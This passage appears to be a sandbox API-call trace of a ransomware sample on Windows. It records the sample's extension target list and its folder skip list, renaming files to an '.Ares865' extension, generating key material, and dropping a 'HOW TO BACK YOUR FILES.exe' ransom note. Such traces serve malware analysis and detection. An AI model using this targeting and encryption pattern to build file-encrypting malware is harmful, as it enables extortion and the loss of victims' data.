lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0065.283] lstrlenW (lpString="rar") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0065.283] lstrlenW (lpString="zip") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0065.283] lstrlenW (lpString="tgz") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0065.283] lstrlenW (lpString="vbox") returned 4 [0065.283] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0065.283] lstrlenW (lpString="vdi") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0065.283] lstrlenW (lpString="vhd") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0065.283] lstrlenW (lpString="vhdx") returned 4 [0065.283] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0065.283] lstrlenW (lpString="avhd") returned 4 [0065.283] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0065.283] lstrlenW (lpString="db") returned 2 [0065.283] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0065.283] lstrlenW (lpString="db2") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0065.283] lstrlenW (lpString="db3") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0065.284] lstrlenW (lpString="dbf") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0065.284] lstrlenW (lpString="mdf") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0065.284] lstrlenW (lpString="mdb") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0065.284] lstrlenW (lpString="sql") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0065.284] lstrlenW (lpString="sqlite") returned 6 [0065.284] lstrcmpiW (lpString1="ex.dat", lpString2="sqlite") returned -1 [0065.284] lstrlenW (lpString="sqlite3") returned 7 [0065.284] lstrcmpiW (lpString1="dex.dat", lpString2="sqlite3") returned -1 [0065.284] lstrlenW (lpString="sqlitedb") returned 8 [0065.284] lstrcmpiW (lpString1="ndex.dat", lpString2="sqlitedb") returned -1 [0065.284] lstrlenW (lpString="xml") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0065.284] lstrlenW (lpString="$er") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0065.284] lstrlenW (lpString="4dd") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0065.284] lstrlenW (lpString="4dl") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0065.284] lstrlenW (lpString="^^^") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0065.284] lstrlenW (lpString="abs") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0065.284] lstrlenW (lpString="abx") returned 3 [0065.284] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0065.284] lstrlenW (lpString="accdb") returned 5 [0065.284] lstrcmpiW (lpString1="x.dat", lpString2="accdb") returned 1 [0065.284] lstrlenW (lpString="accdc") returned 5 [0065.284] lstrcmpiW (lpString1="x.dat", lpString2="accdc") returned 1 [0065.284] lstrlenW (lpString="accde") returned 5 [0065.284] lstrcmpiW (lpString1="x.dat", lpString2="accde") returned 1 [0065.284] lstrlenW (lpString="accdr") returned 5 [0065.284] lstrcmpiW (lpString1="x.dat", lpString2="accdr") returned 1 [0065.284] lstrlenW (lpString="accdt") returned 5 [0065.284] lstrcmpiW (lpString1="x.dat", lpString2="accdt") returned 1 [0065.285] lstrlenW (lpString="accdw") returned 5 [0065.285] lstrcmpiW (lpString1="x.dat", lpString2="accdw") returned 1 [0065.285] lstrlenW (lpString="accft") returned 5 [0065.285] lstrcmpiW (lpString1="x.dat", lpString2="accft") returned 1 [0065.285] lstrlenW (lpString="adb") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0065.285] lstrlenW (lpString="adb") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0065.285] lstrlenW (lpString="ade") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0065.285] lstrlenW (lpString="adf") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0065.285] lstrlenW (lpString="adn") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0065.285] lstrlenW (lpString="adp") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0065.285] lstrlenW (lpString="alf") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0065.285] lstrlenW (lpString="ask") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0065.285] lstrlenW (lpString="btr") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0065.285] lstrlenW (lpString="cat") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0065.285] lstrlenW (lpString="cdb") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0065.285] lstrlenW (lpString="ckp") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0065.285] lstrlenW (lpString="cma") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0065.285] lstrlenW (lpString="cpd") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0065.285] lstrlenW (lpString="dacpac") returned 6 [0065.285] lstrcmpiW (lpString1="ex.dat", lpString2="dacpac") returned 1 [0065.285] lstrlenW (lpString="dad") returned 3 [0065.285] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0065.285] lstrlenW (lpString="dadiagrams") returned 10 [0065.286] lstrlenW (lpString="daschema") returned 8 [0065.286] lstrcmpiW (lpString1="ndex.dat", lpString2="daschema") returned 1 [0065.286] lstrlenW (lpString="db-journal") returned 10 [0065.286] lstrlenW (lpString="db-shm") returned 6 [0065.286] lstrcmpiW (lpString1="ex.dat", lpString2="db-shm") returned 1 [0065.286] lstrlenW (lpString="db-wal") returned 6 [0065.286] lstrcmpiW (lpString1="ex.dat", lpString2="db-wal") returned 1 [0065.286] lstrlenW (lpString="dbc") returned 3 [0065.286] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0065.286] lstrlenW (lpString="dbs") returned 3 [0065.286] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0065.286] lstrlenW (lpString="dbt") returned 3 [0065.286] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0065.286] lstrlenW (lpString="dbv") returned 3 [0065.286] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0065.286] lstrlenW (lpString="dbx") returned 3 [0065.286] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0065.286] lstrlenW (lpString="dcb") returned 3 [0065.286] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0065.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\index.dat.Ares865") returned 76 [0065.286] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\index.dat"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\index.dat.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\index.dat.ares865"), dwFlags=0x1) returned 1 [0065.288] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\index.dat.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.288] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0065.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.288] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.289] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x118 [0065.290] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x190000 [0065.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.293] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.293] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.293] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.293] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.294] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.294] CloseHandle (hObject=0x118) returned 1 [0065.294] CloseHandle (hObject=0x164) returned 1 [0065.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.295] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="aoldtz.exe") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2=".") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="..") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="windows") returned -1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="bootmgr") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="temp") returned -1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="pagefile.sys") returned -1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="boot") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="ids.txt") returned 1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="ntuser.dat") returned -1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="perflogs") returned -1 [0065.295] lstrcmpiW (lpString1="KQMHSVKD", lpString2="MSBuild") returned -1 [0065.295] lstrlenW (lpString="KQMHSVKD") returned 8 [0065.295] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\index.dat") returned 68 [0065.295] lstrcpyW (in: lpString1=0x2cce476, lpString2="KQMHSVKD" | out: lpString1="KQMHSVKD") returned="KQMHSVKD" [0065.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0065.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9c70 [0065.296] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2d2268 [0065.296] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 0 [0065.296] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.296] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2528 [0065.296] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0065.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.296] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 67 [0065.296] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.296] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.296] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.297] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.297] GetLastError () returned 0x0 [0065.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.297] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.297] CloseHandle (hObject=0x12c) returned 1 [0065.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.297] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.297] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.297] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.297] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.297] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.297] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.297] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.297] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.298] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.298] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.298] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.298] lstrlenW (lpString="desktop.ini") returned 11 [0065.298] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\*") returned 69 [0065.298] lstrcpyW (in: lpString1=0x2cce488, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.298] lstrlenW (lpString="desktop.ini") returned 11 [0065.298] lstrlenW (lpString="Ares865") returned 7 [0065.298] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.298] lstrlenW (lpString=".dll") returned 4 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.298] lstrlenW (lpString=".lnk") returned 4 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.298] lstrlenW (lpString=".ini") returned 4 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.298] lstrlenW (lpString=".sys") returned 4 [0065.298] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.298] lstrlenW (lpString="desktop.ini") returned 11 [0065.298] lstrlenW (lpString="bak") returned 3 [0065.298] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.298] lstrlenW (lpString="ba_") returned 3 [0065.298] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.299] lstrlenW (lpString="dbb") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.299] lstrlenW (lpString="vmdk") returned 4 [0065.299] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.299] lstrlenW (lpString="rar") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.299] lstrlenW (lpString="zip") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.299] lstrlenW (lpString="tgz") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.299] lstrlenW (lpString="vbox") returned 4 [0065.299] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.299] lstrlenW (lpString="vdi") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.299] lstrlenW (lpString="vhd") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.299] lstrlenW (lpString="vhdx") returned 4 [0065.299] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0065.299] lstrlenW (lpString="avhd") returned 4 [0065.299] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.299] lstrlenW (lpString="db") returned 2 [0065.299] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.299] lstrlenW (lpString="db2") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.299] lstrlenW (lpString="db3") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.299] lstrlenW (lpString="dbf") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.299] lstrlenW (lpString="mdf") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.299] lstrlenW (lpString="mdb") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.299] lstrlenW (lpString="sql") returned 3 [0065.299] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.299] lstrlenW (lpString="sqlite") returned 6 [0065.299] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.300] lstrlenW (lpString="sqlite3") returned 7 [0065.300] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.300] lstrlenW (lpString="sqlitedb") returned 8 [0065.300] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.300] lstrlenW (lpString="xml") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.300] lstrlenW (lpString="$er") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.300] lstrlenW (lpString="4dd") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.300] lstrlenW (lpString="4dl") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.300] lstrlenW (lpString="^^^") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.300] lstrlenW (lpString="abs") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.300] lstrlenW (lpString="abx") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.300] lstrlenW (lpString="accdb") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.300] lstrlenW (lpString="accdc") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.300] lstrlenW (lpString="accde") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.300] lstrlenW (lpString="accdr") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.300] lstrlenW (lpString="accdt") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.300] lstrlenW (lpString="accdw") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.300] lstrlenW (lpString="accft") returned 5 [0065.300] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.300] lstrlenW (lpString="adb") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.300] lstrlenW (lpString="adb") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.300] lstrlenW (lpString="ade") returned 3 [0065.300] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.301] lstrlenW (lpString="adf") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.301] lstrlenW (lpString="adn") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.301] lstrlenW (lpString="adp") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.301] lstrlenW (lpString="alf") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.301] lstrlenW (lpString="ask") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.301] lstrlenW (lpString="btr") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.301] lstrlenW (lpString="cat") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.301] lstrlenW (lpString="cdb") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.301] lstrlenW (lpString="ckp") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.301] lstrlenW (lpString="cma") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.301] lstrlenW (lpString="cpd") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.301] lstrlenW (lpString="dacpac") returned 6 [0065.301] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.301] lstrlenW (lpString="dad") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.301] lstrlenW (lpString="dadiagrams") returned 10 [0065.301] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.301] lstrlenW (lpString="daschema") returned 8 [0065.301] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.301] lstrlenW (lpString="db-journal") returned 10 [0065.301] lstrcmpiW (lpString1="esktop.ini", 